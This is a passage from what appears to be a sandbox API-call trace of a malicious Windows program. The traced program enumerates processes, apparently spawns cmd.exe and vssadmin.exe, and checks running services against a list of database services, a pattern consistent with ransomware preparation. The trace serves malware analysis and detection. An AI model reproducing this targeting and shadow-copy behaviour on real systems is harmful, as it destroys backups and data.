th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0316.940] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0316.940] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0316.940] lstrlenW (lpString="Memory Compression") returned 18 [0316.941] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0316.941] lstrlenW (lpString="sihost.exe") returned 10 [0316.941] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0316.942] lstrlenW (lpString="svchost.exe") returned 11 [0316.942] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0316.942] lstrlenW (lpString="taskhostw.exe") returned 13 [0316.942] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x37, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0316.943] lstrlenW (lpString="explorer.exe") returned 12 [0316.943] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0316.944] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0316.944] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0316.945] lstrlenW (lpString="SearchUI.exe") returned 12 [0316.945] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0316.945] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0316.945] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0316.946] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0316.946] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0316.946] lstrlenW (lpString="wdgmug.exe") returned 10 [0316.946] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0316.947] lstrlenW (lpString="cmd.exe") returned 7 [0316.947] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0317.059] lstrlenW (lpString="conhost.exe") returned 11 [0317.059] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0317.060] lstrlenW (lpString="vssadmin.exe") returned 12 [0317.060] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0317.068] lstrlenW (lpString="consent.exe") returned 11 [0317.074] Process32NextW (in: hSnapshot=0x53c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0317.082] CloseHandle (hObject=0x53c) returned 1 [0317.092] Sleep (dwMilliseconds=0x1f4) [0317.921] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a4e0 [0317.941] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0317.947] GetLastError () returned 0xea [0317.947] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1cb6) returned 0x41549e0 [0317.947] EnumServicesStatusExW (in: hSCManager=0x401a4e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x41549e0, cbBufSize=0x1cb6, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x41549e0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0317.953] CloseServiceHandle (hSCObject=0x401a4e0) returned 1 [0317.954] lstrlenW (lpString="Appinfo") returned 7 [0317.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0317.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0317.954] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0317.954] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0317.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0317.954] lstrlenW (lpString="AppXSvc") returned 7 [0317.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0317.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0317.955] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0317.955] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0317.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0317.955] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0317.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0317.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0317.955] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0317.955] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0317.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0317.955] lstrlenW (lpString="Audiosrv") returned 8 [0317.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0317.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0317.955] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0317.955] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0317.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0317.955] lstrlenW (lpString="BFE") returned 3 [0317.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0317.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0317.955] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0317.955] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0317.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0317.956] lstrlenW (lpString="BITS") returned 4 [0317.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0317.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0317.956] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0317.956] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0317.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0317.956] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0317.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0317.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0317.956] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0317.956] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0317.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0317.956] lstrlenW (lpString="CDPSvc") returned 6 [0317.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0317.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0317.956] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0317.956] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0317.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0317.956] lstrlenW (lpString="ClickToRunSvc") returned 13 [0317.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0317.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0317.957] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0317.957] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0317.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0317.957] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0317.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0317.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0317.957] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0317.957] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0317.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0317.957] lstrlenW (lpString="CryptSvc") returned 8 [0317.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0317.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0317.957] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0317.957] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0317.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0317.957] lstrlenW (lpString="DcomLaunch") returned 10 [0317.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0317.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0317.957] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0317.957] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0317.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0317.958] lstrlenW (lpString="DeviceAssociationService") returned 24 [0317.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0317.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0317.958] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0317.958] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0317.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0317.958] lstrlenW (lpString="Dhcp") returned 4 [0317.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0317.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0317.958] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0317.958] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0317.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0317.958] lstrlenW (lpString="Dnscache") returned 8 [0317.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0317.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0317.958] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0317.958] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0317.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0317.958] lstrlenW (lpString="DPS") returned 3 [0317.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0317.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0317.958] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0317.958] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0317.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0317.959] lstrlenW (lpString="DusmSvc") returned 7 [0317.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0317.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0317.959] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0317.959] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0317.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0317.959] lstrlenW (lpString="EventLog") returned 8 [0317.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0317.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0317.959] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0317.959] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0317.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0317.959] lstrlenW (lpString="EventSystem") returned 11 [0317.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0317.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0317.959] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0317.959] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0317.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0317.959] lstrlenW (lpString="FontCache") returned 9 [0317.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0317.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0317.959] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0317.959] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0317.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0317.960] lstrlenW (lpString="gpsvc") returned 5 [0317.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0317.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0317.960] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0317.960] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0317.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0317.960] lstrlenW (lpString="iphlpsvc") returned 8 [0317.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0317.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0317.960] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0317.960] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0317.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0317.960] lstrlenW (lpString="KeyIso") returned 6 [0317.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0317.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0317.960] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0317.960] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0317.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0317.960] lstrlenW (lpString="LanmanServer") returned 12 [0317.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0317.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0317.960] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0317.960] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0317.960] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0317.960] lstrlenW (lpString="LanmanWorkstation") returned 17 [0317.960] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0317.960] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0317.960] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0317.960] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0317.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0317.961] lstrlenW (lpString="lfsvc") returned 5 [0317.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0317.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0317.961] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0317.961] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0317.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0317.961] lstrlenW (lpString="lmhosts") returned 7 [0317.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0317.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0317.961] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0317.961] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0317.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0317.961] lstrlenW (lpString="LSM") returned 3 [0317.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0317.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0317.961] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0317.961] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0317.961] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0317.961] lstrlenW (lpString="MpsSvc") returned 6 [0317.961] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0317.961] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0317.961] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0317.962] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0317.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0317.962] lstrlenW (lpString="NcbService") returned 10 [0317.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0317.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0317.962] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0317.962] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0317.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0317.962] lstrlenW (lpString="netprofm") returned 8 [0317.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0317.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0317.962] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0317.962] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0317.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0317.962] lstrlenW (lpString="NgcSvc") returned 6 [0317.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0317.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0317.962] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0317.962] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0317.962] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0317.962] lstrlenW (lpString="NlaSvc") returned 6 [0317.962] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0317.962] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0317.962] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0317.963] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0317.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0317.963] lstrlenW (lpString="nsi") returned 3 [0317.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0317.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0317.963] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0317.963] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0317.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0317.963] lstrlenW (lpString="PcaSvc") returned 6 [0317.963] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0317.963] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0317.963] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0317.963] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0317.963] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0317.963] lstrlenW (lpString="PlugPlay") returned 8 [0317.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0317.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0317.964] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0317.964] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0317.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0317.964] lstrlenW (lpString="Power") returned 5 [0317.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0317.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0317.964] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0317.964] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0317.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0317.964] lstrlenW (lpString="ProfSvc") returned 7 [0317.964] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0317.964] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0317.964] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0317.964] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0317.964] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0317.964] lstrlenW (lpString="RpcEptMapper") returned 12 [0317.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0317.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0317.965] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0317.965] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0317.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0317.965] lstrlenW (lpString="RpcSs") returned 5 [0317.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0317.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0317.965] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0317.965] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0317.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0317.965] lstrlenW (lpString="SamSs") returned 5 [0317.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0317.965] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0317.965] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0317.965] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0317.965] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0317.965] lstrlenW (lpString="Schedule") returned 8 [0317.965] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0317.965] 